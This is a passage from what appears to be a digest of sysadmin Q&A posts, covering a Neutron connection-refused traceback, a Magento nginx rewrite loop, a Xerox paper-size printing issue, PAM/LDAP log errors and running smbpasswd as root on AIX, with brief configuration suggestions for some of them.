      File "/usr/lib/python2.7/dist-packages/neutronclient/shell.py", line 90, in run_command
        return cmd.run(known_args)
      File "/usr/lib/python2.7/dist-packages/neutronclient/common/command.py", line 29, in run
        return super(OpenStackCommand, self).run(parsed_args)
      File "/usr/lib/python2.7/dist-packages/cliff/display.py", line 91, in run
        column_names, data = self.take_action(parsed_args)
      File "/usr/lib/python2.7/dist-packages/neutronclient/common/command.py", line 35, in take_action
        return self.get_data(parsed_args)
      File "/usr/lib/python2.7/dist-packages/neutronclient/neutron/v2_0/__init__.py", line 669, in get_data
        data = self.retrieve_list(parsed_args)
      File "/usr/lib/python2.7/dist-packages/neutronclient/neutron/v2_0/__init__.py", line 638, in retrieve_list
        data = self.call_server(neutron_client, search_opts, parsed_args)
      File "/usr/lib/python2.7/dist-packages/neutronclient/neutron/v2_0/__init__.py", line 610, in call_server
        data = obj_lister(**search_opts)
      File "/usr/lib/python2.7/dist-packages/neutronclient/v2_0/client.py", line 99, in with_params
        ret = self.function(instance, *args, **kwargs)
      File "/usr/lib/python2.7/dist-packages/neutronclient/v2_0/client.py", line 301, in list_extensions
        return self.get(self.extensions_path, params=_params)
      File "/usr/lib/python2.7/dist-packages/neutronclient/v2_0/client.py", line 1321, in get
        headers=headers, params=params)
      File "/usr/lib/python2.7/dist-packages/neutronclient/v2_0/client.py", line 1298, in retry_request
        headers=headers, params=params)
      File "/usr/lib/python2.7/dist-packages/neutronclient/v2_0/client.py", line 1241, in do_request
        content_type=self.content_type())
      File "/usr/lib/python2.7/dist-packages/neutronclient/client.py", line 319, in do_request
        return self.request(url, method, **kwargs)
      File "/usr/lib/python2.7/dist-packages/neutronclient/client.py", line 63, in request
        return self._request(url, method, body=body, headers=headers, **kwargs)
      File "/usr/lib/python2.7/dist-packages/neutronclient/client.py", line 314, in _request
        **kwargs)
      File "/usr/lib/python2.7/dist-packages/keystoneclient/utils.py", line 318, in inner
        return func(*args, **kwargs)
      File "/usr/lib/python2.7/dist-packages/keystoneclient/session.py", line 324, in request
        resp = self._send_request(url, method, redirect, log, **kwargs)
      File "/usr/lib/python2.7/dist-packages/keystoneclient/session.py", line 359, in _send_request
        raise exceptions.ConnectionRefused(msg)
    ConnectionRefused: Unable to establish connection to http://controller:9696/v2.0/extensions.json
    Unable to establish connection to http://controller:9696/v2.0/extensions.json

Do you know what could be the issue?
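Given that the Keystone call on port 35357 succeeds but the connection to controller:9696 is refused, the neutron-server API service is probably not running or not listening. Some hedged first checks for the Ubuntu Juno packages:

    service neutron-server status            # is the API service up?
    netstat -tlnp | grep 9696                # is anything listening on the Neutron port?
    tail -n 50 /var/log/neutron/server.log   # startup errors (often database or RabbitMQ credentials)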

Nginx URL virtual host rewrite issues with Magento e-commerce

Posted: 12 Dec 2021 11:08 PM PST

I've been running into some problems with my URL rewrites. When I click a link in my Magento back-end it completely messes up the URL.

We start with this link:

http://icanttellmydomain.nl/index.php/paneel/dashboard/index/key/26f665360ac9f2e3e9b5c69b097fcb6b/

But we are redirected here:

http://icanttellmydomain.nl/index.php/paneel/permissions_user/index/key/index.php/paneel/system_config/index/key/4015c27aea900ad7fceb13e27b76560c/index.php/paneel/dashboard/index/key/26f665360ac9f2e3e9b5c69b097fcb6b/index.php/paneel/dashboard/index/key/26f665360ac9f2e3e9b5c69b097fcb6b/index.php/paneel/dashboard/index/key/26f665360ac9f2e3e9b5c69b097fcb6b/index.php/paneel/dashboard/index/key/26f665360ac9f2e3e9b5c69b097fcb6b/index.php/paneel/dashboard/index...............

It keeps repeating 'index.php' and the URL path, looping until it gives me a 500 internal error or "The page isn't redirecting properly".

I'm pretty sure it has to do with my vhost configuration. I tried commenting out:

    #Forward paths like /js/index.php/x.js to relevant handler
    #   location ~ .php/ {
    #       rewrite ^(.*.php)/ $1 last;
    #   }

but it didn't do the trick.

My Vhost:

    server {
        listen   80; ## listen for ipv4; this line is default and implied
        listen   [::]:80 default_server ipv6only=on; ## listen for ipv6
        listen   443 default ssl;

        root /usr/share/nginx/www/xxxxxxxx/public/;
        index index.html index.htm;

        # Make site accessible from http://<serverip/domain>/
        server_name xxx.xxx.xxx.xxx;

        error_log  /var/log/nginx/error.log; #warn; # logging at warn level
        #access_log off; # disabled to save I/O
        access_log /var/log/nginx/access.log;

        location / {
            index index.html index.php;
            #autoindex on;
            ## If missing pass the URI to Magento's front handler
            try_files $uri $uri/ @handler;
            expires max;
        }

        ## These locations need to be denied
        location ^~ /app/                { deny all; }
        location ^~ /includes/           { deny all; }
        location ^~ /lib/                { deny all; }
        location ^~ /media/downloadable/ { deny all; }
        location ^~ /pkginfo/            { deny all; }
        location ^~ /report/config.xml   { deny all; }
        location ^~ /var/                { deny all; }

        ## Disable .htaccess and other hidden files
        location /. {
            access_log off;
            log_not_found off;
            return 404;
            deny all;
        }

        ## Magento uses a common front handler
        location @handler {
            rewrite / /index.php;
        }

        #Forward paths like /js/index.php/x.js to relevant handler
        #   location ~ .php/ {
        #       rewrite ^(.*.php)/ $1 last;
        #   }

        ## Rewrite for versioned CSS+JS via filemtime (file modification time)
        location ~* ^.+\.(css|js)$ {
            rewrite ^(.+)\.(\d+)\.(css|js)$ $1.$3 last;
            expires 31536000s;
            access_log off;
            log_not_found off;
            add_header Pragma public;
            add_header Cache-Control "max-age=31536000, public";
        }

        ## php-fpm parsing
        location ~ \.php.*$ {
            ## Catch 404s that try_files miss
            if (!-e $request_filename) { rewrite / /index.php last; }

            ## Disable cache for php files
            expires off;

            ## php-fpm configuration
            fastcgi_pass   unix:/var/run/php5-fpm.sock;
            fastcgi_param  HTTPS $https if_not_empty;
            fastcgi_param  SCRIPT_FILENAME  $document_root$fastcgi_script_name;
            include        fastcgi_params;

            ## Store code is located at Administration > Configuration > Manage Stores
            fastcgi_param  MAGE_RUN_CODE default;
            fastcgi_param  MAGE_RUN_TYPE store;

            ## Tweak fastcgi buffers, just in case.
            fastcgi_buffer_size 128k;
            fastcgi_buffers 256 4k;
            fastcgi_busy_buffers_size 256k;
            fastcgi_temp_file_write_size 256k;
        }
    }
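One thing that stands out: the commented-out rewrite block is what would normally strip the PATH_INFO-style suffix, and with it disabled the `location ~ \.php.*$` block plus the internal `rewrite / /index.php last;` can bounce requests around. A more conventional Magento 1 PHP block uses fastcgi_split_path_info, so URLs like /index.php/paneel/... resolve to the script plus PATH_INFO in one pass. A hedged sketch, reusing the socket path from the config above:

    location ~ ^(.+\.php)(/.*)?$ {
        fastcgi_split_path_info ^(.+\.php)(/.*)$;
        fastcgi_param PATH_INFO        $fastcgi_path_info;
        fastcgi_param SCRIPT_FILENAME  $document_root$fastcgi_script_name;
        include fastcgi_params;
        fastcgi_pass unix:/var/run/php5-fpm.sock;
    }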

Thanks for reading! I'm new to all this stuff so take that into consideration in your replies please.

Printing weirdness - German language, Xerox 7125

Posted: 12 Dec 2021 10:36 PM PST

Please read carefully for the problem details and the steps I have taken to troubleshoot.

We have an executive at my organization who has a German-language machine running Windows 7.

I have installed the German-language drivers and set the printer to use 'Letter' size paper rather than A4.

  • I am able to print a test page just fine.
  • I am able to create a word or excel document and print it just fine.

When another user emails a document to this fellow and he tries to print it, it seems to print at A4 size (though with the PCL6 driver it gives error code 016-749). This despite the printer settings still being on Letter (including the Printing Defaults). Here are some observations:

  • I have quadruple checked the printer settings. It is on Letter.
  • The document is not formatted strangely or set to an alternative paper type, as far as I can tell; it's generated by an English user, for Christ's sake!
  • I have tested with PS driver, PCL6 driver, and Xerox's 'Global' driver. None work.
  • I can print the document just fine to a Xerox 7556 down the hall.
  • I am connected to the printer by IP, but have also tried to print to it via a share from a print server. No difference in results.
  • If I copy the contents of the document and paste it into a brand new document, it prints just fine.

I'm really scratching my head here. A printer driver bug?

Can anyone suggest something else to try in order to fix this problem?

error in auth.log but can login; LDAP/PAM

Posted: 12 Dec 2021 10:04 PM PST

I have a server running OpenLDAP. When I start an SSH session I can log in without problems, but an error appears in the logs. This only happens when I log in with an LDAP account (not with a system account such as root). Any help eliminating these errors would be much appreciated.

The relevant piece from /var/log/auth.log

    sshd[6235]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=example.com  user=peter
    sshd[6235]: Accepted password for peter from 192.168.1.2 port 2441 ssh2
    sshd[6235]: pam_unix(sshd:session): session opened for user peter by (uid=0)

pam common-session

    session [default=1]     pam_permit.so
    session required        pam_unix.so
    session optional        pam_ldap.so
    session required        pam_mkhomedir.so skel=/etc/skel umask=0022
    session required        pam_limits.so
    session required        pam_unix.so
    session optional        pam_ldap.so

pam common-auth

    auth    [success=1 default=ignore]      pam_ldap.so
    auth    required                        pam_unix.so nullok_secure use_first_pass
    auth    required                        pam_permit.so
    session required                        pam_mkhomedir.so skel=/etc/skel umask=0022 silent
    auth    sufficient                      pam_unix.so nullok_secure use_first_pass
    auth    requisite                       pam_succeed_if.so uid >= 1000 quiet
    auth    sufficient                      pam_ldap.so use_first_pass
    auth    required                        pam_deny.so

pam common-account

    account [success=2 new_authtok_reqd=done default=ignore]        pam_ldap.so
    account [success=1 default=ignore]                              pam_unix.so
    account required                                                pam_unix.so
    account sufficient                                              pam_succeed_if.so uid < 1000 quiet
    account [default=bad success=ok user_unknown=ignore]            pam_ldap.so
    account required                                                pam_permit.so
    account sufficient                                              pam_ldap.so
    account sufficient                                              pam_unix.so
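For context, these stanzas look like a hand-merged mix of two generations of config, which is part of why pam_unix runs (and logs a failure for LDAP-only users) in some paths. The stock pam-auth-update layout with libpam-ldap looks roughly like the sketch below; regenerating via pam-auth-update is usually safer than hand-editing:

    # common-auth
    auth    [success=2 default=ignore]  pam_unix.so nullok_secure
    auth    [success=1 default=ignore]  pam_ldap.so use_first_pass
    auth    requisite                   pam_deny.so
    auth    required                    pam_permit.so

Even with this ordering, the pam_unix "authentication failure" line for LDAP users is expected and harmless, since pam_unix is tried first and the stack then falls through to pam_ldap.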

How to run smbpasswd as root on AIX?

Posted: 13 Dec 2021 02:05 AM PST

I have Hitachi ID Password Manager (formerly P-Synch) set up to change the password on (among other systems) an AIX 6.1 server running Samba. P-Synch can execute additional commands by configuring a "chat script" in the conf file, but it does not send the old password, and it runs the script as the P-Synch admin ID.

Only root can change a Samba password without the old password. I could get around this problem with sudo, but it is not currently installed on the AIX system, and I want to make sure that sudo is the only option before installing and configuring it.
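If sudo does turn out to be the way, the entry can be tightly scoped. A minimal sudoers sketch, where "psadmin" and the smbpasswd path are placeholders for the actual admin ID and Samba install location:

    # Allow the Password Manager admin ID to set Samba passwords as root,
    # without being prompted for a password itself.
    psadmin ALL = (root) NOPASSWD: /usr/local/samba/bin/smbpasswd

The chat script would then invoke: sudo /usr/local/samba/bin/smbpasswd <user>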

Any suggestions?
